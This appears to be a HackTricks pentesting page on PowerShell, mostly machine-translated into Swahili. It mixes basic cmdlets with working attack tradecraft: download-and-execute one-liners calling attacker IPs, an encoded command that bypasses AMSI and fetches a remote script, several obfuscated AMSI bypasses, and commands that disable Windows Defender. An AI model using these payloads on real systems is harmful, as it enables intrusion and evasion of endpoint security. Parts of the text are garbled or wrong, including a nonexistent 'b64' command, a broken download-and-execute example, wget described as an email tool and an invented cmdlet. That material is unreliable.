| .. | ||
| powerview.md | ||
| README.md | ||
PowerShell ya Msingi kwa Wapenzi wa Pentesting
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.
Maeneo ya Kawaida ya PowerShell
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
Amri za Msingi za PS za Kuanza
Katika sehemu hii, tutajifunza amri za msingi za PowerShell ambazo zinaweza kutumiwa na wapenzi wa pentesting. Amri hizi zitasaidia kuanza na kuelewa mazingira ya PowerShell.
Get-Command
Amri hii inatumika kuonyesha orodha ya amri zote zinazopatikana katika PowerShell.
Get-Command
Get-Help
Amri hii inatumika kupata maelezo ya kina kuhusu amri fulani ya PowerShell.
Get-Help <amri>
Get-Member
Amri hii inatumika kuonyesha maelezo ya kina kuhusu mali na njia zinazopatikana kwa kitu fulani katika PowerShell.
<kitu> | Get-Member
Get-Process
Amri hii inatumika kuonyesha mchakato wa sasa unaofanya kazi kwenye mfumo.
Get-Process
Get-Service
Amri hii inatumika kuonyesha huduma zilizosajiliwa kwenye mfumo.
Get-Service
Get-EventLog
Amri hii inatumika kuonyesha kumbukumbu za matukio kwenye mfumo.
Get-EventLog -LogName <jina_la_kumbukumbu>
Get-WmiObject
Amri hii inatumika kuonyesha habari kutoka kwa WMI (Windows Management Instrumentation).
Get-WmiObject -Class <darasa> -Namespace <nafasi>
Get-ChildItem
Amri hii inatumika kuonyesha vitu vilivyomo ndani ya saraka fulani.
Get-ChildItem -Path <njia>
Set-Location
Amri hii inatumika kubadili saraka ya sasa katika PowerShell.
Set-Location -Path <njia>
Clear-Host
Amri hii inatumika kusafisha skrini ya PowerShell.
Clear-Host
Exit
Amri hii inatumika kumaliza kikao cha PowerShell.
Exit
Hizi ni baadhi tu ya amri za msingi za PowerShell ambazo zinaweza kutumiwa katika pentesting. Kujifunza na kuelewa amri hizi ni hatua muhimu katika kuanza kufanya kazi na PowerShell.
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic
Get-Help Get-Item -Examples #List examples
Import-Module <modulepath>
Get-Command -Module <modulename>
Pakua na Tekeleza
To download and execute a file using PowerShell, you can use the following command:
Invoke-WebRequest -Uri <URL> -OutFile <output file> | Invoke-Expression
Replace <URL> with the URL of the file you want to download, and <output file> with the desired name for the downloaded file.
For example, to download a file from http://example.com/file.exe and execute it, you can use the following command:
Invoke-WebRequest -Uri http://example.com/file.exe -OutFile file.exe | Invoke-Expression
This command will download the file and save it as file.exe in the current directory. Then, it will execute the downloaded file.
Keep in mind that executing files downloaded from untrusted sources can be dangerous. Always exercise caution and ensure the file is from a trusted source before executing it.
g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
#https://twitter.com/Alh4zr3d/status/1566489367232651264
#host a text record with your payload at one of your (unburned) domains and do this:
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
Pakua na Tekeleza kwa Nyuma na Kupitisha AMSI
This technique allows you to download and execute a file in the background while bypassing AMSI (Antimalware Scan Interface).
Tekniki hii inakuwezesha kupakua na kutekeleza faili kwa nyuma wakati unapitisha AMSI (Antimalware Scan Interface).
PowerShell Script
$URL = "http://example.com/malicious-file.exe"
$Output = "C:\Temp\malicious-file.exe"
# Download the file
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($URL, $Output)
# Bypass AMSI
$Bypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')
$Bypass.SetValue($null,$true)
# Execute the file
Start-Process -FilePath $Output -WindowStyle Hidden
Maelezo
- Set the
$URLvariable to the URL of the malicious file you want to download. - Set the
$Outputvariable to the desired location and name of the downloaded file. - The script uses the
System.Net.WebClientclass to download the file from the specified URL and save it to the specified output location. - The script then bypasses AMSI by accessing the
amsiInitFailedfield of theSystem.Management.Automation.AmsiUtilsclass and setting it to$true. - Finally, the script executes the downloaded file using the
Start-Processcmdlet with the-WindowStyle Hiddenparameter to run it in the background without displaying any windows.
Usage
Save the PowerShell script to a file with a .ps1 extension (e.g., download_execute.ps1). Open a PowerShell session and navigate to the directory where the script is saved. Run the script by typing .\download_execute.ps1 and pressing Enter. The file will be downloaded and executed in the background, bypassing AMSI.
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
Kutumia b64 kutoka kwenye linux
To encode or decode base64 strings from the command line in Linux, you can use the b64 command. This command allows you to easily convert data to and from base64 format.
To encode a string to base64, use the following command:
echo -n "string_to_encode" | b64
To decode a base64 string, use the following command:
echo -n "base64_string_to_decode" | b64 -d
Replace "string_to_encode" with the actual string you want to encode, and "base64_string_to_decode" with the base64 string you want to decode.
Note: The -n option is used to prevent the echo command from adding a newline character at the end of the string.
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
Pakua
System.Net.WebClient
Unaweza kutumia darasa la System.Net.WebClient katika PowerShell ili kupakua faili kutoka kwenye mtandao. Unaweza kutumia hatua zifuatazo:
$webClient = New-Object System.Net.WebClient
$url = "URL_YA_FAILI"
$path = "NJIA_YA_KUHIFADHIA_FAILI"
$webClient.DownloadFile($url, $path)
Kwa mfano, ikiwa unataka kupakua faili kutoka kwenye URL https://www.example.com/file.txt na kuihifadhi kwenye njia C:\Downloads\file.txt, unaweza kutumia kanuni ifuatayo:
$webClient = New-Object System.Net.WebClient
$url = "https://www.example.com/file.txt"
$path = "C:\Downloads\file.txt"
$webClient.DownloadFile($url, $path)
Hii itapakua faili kutoka kwenye URL iliyotolewa na kuihifadhi kwenye njia iliyotolewa.
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Kuita-Ombi-Weze
Invoke-WebRequest ni cmdlet ya PowerShell ambayo inatumika kufanya ombi la HTTP au HTTPS kwa seva ya wavuti. Inaweza kutumiwa kwa ufanisi katika uchunguzi wa usalama wa mtandao na uchunguzi wa udhaifu.
Kwa kawaida, Invoke-WebRequest hutumiwa kuchukua maudhui ya ukurasa wa wavuti, kama vile HTML, XML, au JSON. Inaweza pia kutumika kutekeleza vitendo vingine kama vile kutuma data ya POST au kudhibiti kuki za wavuti.
Kwa mfano, unaweza kutumia Invoke-WebRequest kufanya ombi la GET kwa ukurasa wa wavuti na kuchambua majibu ili kupata habari muhimu kama vile anwani za IP, vichwa vya HTTP, au maudhui ya siri.
Kwa kifupi, Invoke-WebRequest ni zana yenye nguvu katika kitabu cha mbinu za kuingilia kati na inaweza kutumiwa kwa ufanisi katika shughuli za uchunguzi wa usalama wa mtandao.
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
Wget
Wget ni chombo cha barua-pepe kinachopatikana kwa watumiaji wa Windows. Inaruhusu watumiaji kupakua faili kutoka kwa seva za wavuti kwa urahisi. Wget inaweza kutumika kwa njia nyingi, kama vile kupakua faili za muziki, video, picha, na nyaraka za maandishi. Ni chombo muhimu kwa wapenzi wa teknolojia na wapenzi wa mtandao.
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
Uhamisho wa Bits
BitsTransfer ni moduli ya PowerShell ambayo inaruhusu uhamisho wa faili kati ya kompyuta. Inaweza kutumika kwa uhamisho wa faili kwa njia ya mtandao, kama vile kupakua faili kutoka kwa seva au kupakia faili kwenye seva.
Kuanzisha Uhamisho wa Bits
Kabla ya kuanza uhamisho wa faili, unahitaji kuanzisha uhusiano wa uhamisho wa Bits. Unaweza kufanya hivyo kwa kutumia amri ifuatayo:
$Job = Start-BitsTransfer -Source <source_path> -Destination <destination_path>
Ambapo <source_path> ni njia ya faili chanzo na <destination_path> ni njia ya faili marudio.
Kuangalia Maendeleo ya Uhamisho
Unaweza kuangalia maendeleo ya uhamisho wa faili kwa kutumia amri ifuatayo:
Get-BitsTransfer -Job $Job
Kusitisha Uhamisho wa Bits
Ikiwa unahitaji kusitisha uhamisho wa faili, unaweza kutumia amri ifuatayo:
Stop-BitsTransfer -Job $Job
Kufuta Uhamisho wa Bits
Ikiwa unahitaji kufuta uhamisho wa faili uliokamilika, unaweza kutumia amri ifuatayo:
Remove-BitsTransfer -Job $Job
Hitimisho
Uhamisho wa Bits ni chombo muhimu katika PowerShell kwa uhamisho wa faili kati ya kompyuta. Inaweza kutumika kwa njia mbalimbali za uhamisho wa faili na inatoa njia rahisi ya kufuatilia na kudhibiti maendeleo ya uhamisho.
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
# OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
Base64 Kali & EncodedCommand
Base64 Kali
Kali Linux ina kipengele kinachoitwa base64 ambacho kinaweza kutumika kwa urahisi kubadilisha data kuwa muundo wa Base64. Hii ni muhimu sana katika uwanja wa udukuzi wa mtandao, kwani inaweza kutumiwa kwa kificho cha data ili kuficha habari muhimu.
Unaweza kutumia amri ifuatayo kwenye Kali Linux ili kubadilisha data kuwa Base64:
echo -n "data" | base64
Badilisha "data" na data halisi unayotaka kubadilisha kuwa Base64.
EncodedCommand
Wakati wa kufanya udukuzi wa mtandao, mara nyingi tunahitaji kuficha amri zetu za PowerShell ili kuepuka kugunduliwa na zana za usalama. Mojawapo ya njia za kufanya hivyo ni kwa kutumia kipengele kinachoitwa EncodedCommand katika PowerShell.
EncodedCommand inaruhusu sisi kubadilisha amri za PowerShell kuwa muundo wa Base64. Hii inamaanisha kuwa amri zetu zitakuwa zimefichwa na hazitaweza kugunduliwa kwa urahisi na zana za usalama.
Unaweza kutumia amri ifuatayo katika PowerShell ili kutekeleza amri iliyofichwa na EncodedCommand:
powershell.exe -EncodedCommand "base64_encoded_command"
Badilisha "base64_encoded_command" na amri yako iliyobadilishwa kuwa Base64.
Ni muhimu kukumbuka kuwa amri zilizofichwa na EncodedCommand zinaweza kugunduliwa na zana za usalama zenye nguvu. Kwa hivyo, ni muhimu kuwa na ufahamu wa mazingira yako na kuchukua hatua za ziada za kujilinda wakati wa kufanya udukuzi wa mtandao.
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand <Base64>
Sera ya Utekelezaji
Lugha Iliyozuiwa
Sera ya AppLocker
Wezesha WinRM (PS ya Mbali)
enable-psremoting -force #This enables winrm
# Change NetWorkConnection Category to Private
#Requires -RunasAdministrator
Get-NetConnectionProfile |
Where{ $_.NetWorkCategory -ne 'Private'} |
ForEach {
$_
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
}
Lemaza Mlinzi (Defender)
{% code overflow="wrap" %}
# Check status
Get-MpComputerStatus
Get-MpPreference | select Exclusion* | fl #Check exclusions
# Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring
Add-MpPreference -ExclusionPath (pwd)
# Check exclusions configured via GPO
Parse-PolFile .\Registry.pol
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0
{% endcode %}
Kupita kwa AMSI
amsi.dll ina kupakiwa ndani ya mchakato wako, na ina maonyesho muhimu kwa programu yoyote kuingiliana nayo. Na kwa sababu inapakiwa ndani ya nafasi ya kumbukumbu ya mchakato unaou udhibiti, unaweza kubadilisha tabia yake kwa kuandika tena maagizo kwenye kumbukumbu. Hii inafanya isigundue chochote.
Kwa hiyo, lengo la kupita kwa AMSI ni kuandika tena maagizo ya DLL hiyo kwenye kumbukumbu ili kufanya ugunduzi usiwe na maana.
Ukurasa wa wavuti wa jenereta ya kupita kwa AMSI: https://amsi.fail/
# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
&( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
${1}.SetValue($null,$true)
# Another Method
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)
# AMSI Bypass in python
https://fluidattacks.com/blog/amsi-bypass-python/
# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass
# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html
Kuepuka AMSI 2 - Kukamata Wito wa API wa Kusimamiwa
Angalia chapisho hili kwa habari za kina na nambari. Utangulizi:
Teknolojia hii mpya inategemea kukamata wito wa API wa njia za .NET. Inavyoonekana, njia za .NET zinahitaji kubadilishwa kuwa maagizo ya mashine ya asili kwenye kumbukumbu ambayo inaonekana kama njia za asili. Njia hizi zilizobadilishwa zinaweza kukamatwa ili kubadilisha mtiririko wa udhibiti wa programu.
Hatua za kukamata wito wa API wa njia za .NET ni:
- Tambua njia ya lengo ya kukamata
- Tafadhali njia na safu ya kazi sawa na lengo
- Tumia uchunguzi kugundua njia
- Hakikisha kila njia imebadilishwa
- Tafuta eneo la kila njia kwenye kumbukumbu
- Badilisha njia ya lengo na maagizo yanayoelekeza kwenye njia yetu ya hatari
Kuepuka AMSI 3 - SeDebug Haki
Kwa kufuata mwongozo huu na nambari unaweza kuona jinsi, ukiwa na haki za kutosha za kuchunguza michakato, unaweza kuzindua mchakato wa powershell.exe, kuchunguza, kufuatilia wakati inapakia amsi.dll na kuidisable.
Kuepuka AMSI - Vyanzo Zaidi
Historia ya PS
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
Tafuta faili mpya
Chaguo: CreationTime, CreationTimeUtc, LastAccessTime, LastAccessTimeUtc, LastWriteTime, LastWriteTimeUtc
# LastAccessTime:
(gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
# LastWriteTime:
(gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName
Pata ruhusa
To determine the permissions of a file or directory in Windows, you can use the Get-Acl cmdlet in PowerShell. This cmdlet retrieves the access control list (ACL) for the specified object.
Get-Acl -Path C:\path\to\file.txt
This command will display the permissions associated with the specified file or directory. The output will include information such as the owner, group, and individual permissions for different users or groups.
To view the permissions for multiple files or directories, you can use wildcards or specify multiple paths separated by commas.
Get-Acl -Path C:\path\to\file1.txt, C:\path\to\file2.txt
Get-Acl -Path C:\path\to\directory\*
By examining the permissions, you can identify any potential security vulnerabilities or misconfigurations that may exist. This information can be useful for conducting a thorough security assessment or penetration test.
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
Toleo la OS na Visahihisho
Kutambua toleo la mfumo wa uendeshaji (OS) na visahihisho (HotFixes) ni muhimu katika mchakato wa uchunguzi wa usalama. Hapa kuna njia kadhaa za kufanya hivyo kwa kutumia PowerShell:
Kutambua Toleo la OS
Unaweza kutumia amri ifuatayo ya PowerShell ili kujua toleo la mfumo wa uendeshaji:
(Get-WmiObject Win32_OperatingSystem).Caption
Kutambua Visahihisho (HotFixes)
Unaweza kutumia amri ifuatayo ya PowerShell ili kupata orodha ya visahihisho vilivyosakinishwa kwenye mfumo wa uendeshaji:
Get-HotFix
Kwa kutumia amri hizi za PowerShell, unaweza kupata habari muhimu kuhusu toleo la mfumo wa uendeshaji na visahihisho vilivyosakinishwa kwenye mfumo wako. Habari hii inaweza kuwa muhimu katika kufanya uchunguzi wa usalama na kuhakikisha kuwa mfumo wako umesasishwa na salama.
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Mazingira
The following are the recommended requirements for setting up the environment for basic PowerShell usage:
- Windows operating system (preferably Windows 10 or later)
- PowerShell version 5.1 or later
- Administrative privileges on the system
PowerShell Basics
PowerShell is a powerful scripting language and command-line shell that is built on the .NET framework. It provides a wide range of functionalities for system administration, automation, and configuration management.
PowerShell Command Syntax
PowerShell commands follow a verb-noun syntax, where the verb represents the action to be performed and the noun represents the target object. For example, Get-Process is a command that retrieves information about running processes.
Running PowerShell Commands
PowerShell commands can be executed in the following ways:
- Interactive Mode: Launch the PowerShell console and type the command directly.
- Script Mode: Create a PowerShell script file with the
.ps1extension and execute it using the.\prefix followed by the script name. - Command Line Mode: Run PowerShell commands directly from the command prompt by using the
powershellcommand followed by the desired command.
PowerShell Help System
PowerShell provides a comprehensive help system that allows users to access detailed information about commands, modules, and concepts. The Get-Help command is used to retrieve help content.
To get help for a specific command, use the following syntax:
Get-Help <command>
For example, to get help for the Get-Process command, use:
Get-Help Get-Process
PowerShell Variables
Variables in PowerShell are used to store and manipulate data. They are represented by a dollar sign $ followed by the variable name. PowerShell variables are case-insensitive.
To assign a value to a variable, use the following syntax:
$variableName = value
For example, to assign the value Hello, World! to a variable named message, use:
$message = "Hello, World!"
PowerShell Pipelines
PowerShell pipelines allow the output of one command to be passed as input to another command. The pipeline operator | is used to connect commands together.
For example, to retrieve the list of running processes and filter the results to only display the ones with the name chrome, use:
Get-Process | Where-Object { $_.Name -eq "chrome" }
PowerShell Modules
PowerShell modules are self-contained packages that contain cmdlets, functions, and other resources. They provide additional functionality and can be imported into a PowerShell session using the Import-Module command.
To import a module, use the following syntax:
Import-Module <moduleName>
For example, to import the ActiveDirectory module, use:
Import-Module ActiveDirectory
PowerShell Execution Policy
PowerShell execution policy determines the security level of script execution. It can be set to one of the following values:
- Restricted: No scripts are allowed to run.
- AllSigned: Only scripts signed by a trusted publisher are allowed to run.
- RemoteSigned: Scripts downloaded from the internet must be signed by a trusted publisher.
- Unrestricted: All scripts can run without any restrictions.
To check the current execution policy, use the following command:
Get-ExecutionPolicy
To change the execution policy, use the following command:
Set-ExecutionPolicy <policy>
Replace <policy> with the desired execution policy value.
PowerShell Aliases
PowerShell aliases are shortcuts for commands or command sequences. They allow users to create custom names for frequently used commands or command combinations.
To view the list of available aliases, use the following command:
Get-Alias
To create a new alias, use the following command:
Set-Alias -Name <aliasName> -Value <command>
Replace <aliasName> with the desired alias name and <command> with the command or command sequence to be aliased.
PowerShell Profiles
PowerShell profiles are scripts that are automatically executed when a PowerShell session starts. They can be used to customize the environment and define custom functions, aliases, and variables.
To create a profile, use the following command:
New-Item -Type File -Path $PROFILE -Force
This will create a new profile file if it doesn't exist. Open the profile file using a text editor and add the desired customizations.
PowerShell Remoting
PowerShell remoting allows users to run PowerShell commands on remote systems. It enables remote administration and automation of tasks across multiple machines.
To enable PowerShell remoting, use the following command:
Enable-PSRemoting
This command needs to be run with administrative privileges.
To connect to a remote system, use the following command:
Enter-PSSession -ComputerName <computerName>
Replace <computerName> with the name or IP address of the remote system.
To exit the remote session, use the following command:
Exit-PSSession
PowerShell Scripting
PowerShell scripts are text files that contain a series of PowerShell commands. They can be used to automate tasks, perform system administration tasks, and execute complex operations.
To create a PowerShell script, open a text editor and save the file with the .ps1 extension. Write the desired PowerShell commands in the file and save it.
To execute a PowerShell script, use the following command:
.\<scriptName>.ps1
Replace <scriptName> with the name of the script file.
PowerShell One-Liners
PowerShell one-liners are single-line commands that perform a specific task. They are useful for quick and concise operations.
For example, to retrieve the list of running processes and display only the ones with a specific name, use:
Get-Process | Where-Object { $_.Name -eq "<processName>" }
Replace <processName> with the desired process name.
Conclusion
This guide provides a basic overview of PowerShell and its usage. Understanding these fundamentals will help you leverage the power of PowerShell for various tasks, including system administration, automation, and configuration management.
Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName @Get UserName value
Drives zingine zilizounganishwa
To check for other connected drives in PowerShell, you can use the following command:
Get-PSDrive
This command will display a list of all the drives that are currently connected to the system, including local drives, network drives, and other types of drives.
To filter the results and display only specific types of drives, you can use the -PSProvider parameter. For example, to display only network drives, you can use the following command:
Get-PSDrive -PSProvider FileSystem
This will show only the network drives that are currently connected to the system.
By using the Get-PSDrive command, you can easily identify and access other connected drives in PowerShell.
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
Kikapu cha Kurejesha
Kikapu cha Kurejesha ni mahali ambapo faili zilizofutwa kwenye mfumo wa Windows zinahifadhiwa kabla ya kufutwa kabisa. Hii inaruhusu watumiaji kuweza kurejesha faili zilizofutwa kwa bahati mbaya au kwa makusudi.
Kikapu cha Kurejesha kinaweza kuwa na habari muhimu kwa mtu anayefanya udukuzi au uchunguzi wa mfumo. Kwa mfano, inaweza kuwa na faili zilizofutwa ambazo zina taarifa nyeti au za siri. Kwa hivyo, kama muhudumu wa udukuzi, ni muhimu kuchunguza Kikapu cha Kurejesha ili kupata habari muhimu.
Kuna njia kadhaa za kufikia Kikapu cha Kurejesha kwenye mfumo wa Windows. Moja ya njia hizo ni kutumia PowerShell. PowerShell ni lugha ya skrini ya Windows ambayo inaweza kutumiwa kufanya shughuli mbalimbali za udukuzi.
Kwa kutumia PowerShell, unaweza kuorodhesha faili zilizopo kwenye Kikapu cha Kurejesha, kurejesha faili zilizofutwa, au hata kufuta faili zilizopo kwenye Kikapu cha Kurejesha. Hii inaweza kuwa na manufaa kwa mtu anayefanya udukuzi au uchunguzi wa mfumo.
Kwa kumalizia, Kikapu cha Kurejesha ni sehemu muhimu ya mfumo wa Windows ambayo inaweza kutoa habari muhimu kwa mtu anayefanya udukuzi au uchunguzi wa mfumo. Kutumia PowerShell, unaweza kufanya shughuli mbalimbali kwenye Kikapu cha Kurejesha, kama vile kuorodhesha, kurejesha, au kufuta faili zilizopo.
$shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()
https://jdhitsolutions.com/blog/powershell/7024/kusimamia-bakuli-la-taka-kwa-kutumia-powershell/
Uchunguzi wa Kikoa
{% content-ref url="powerview.md" %} powerview.md {% endcontent-ref %}
Watumiaji
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
Mbadala wa String Salama hadi Nakala Wazi
Kuna njia mbili za kubadilisha string salama kuwa nakala wazi kwa kutumia PowerShell.
Njia ya Kwanza: Kutumia ConvertFrom-SecureString
Njia hii inahitaji kuwa na ufikiaji wa SecureString halisi na password ya ufunguo wa kufungua SecureString hiyo.
$secureString = ConvertTo-SecureString -String "MySecurePassword" -AsPlainText -Force
$plainText = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))
Njia ya Pili: Kutumia ConvertFrom-StringSecure
Njia hii inahitaji kuwa na ufikiaji wa ConvertFrom-StringSecure cmdlet.
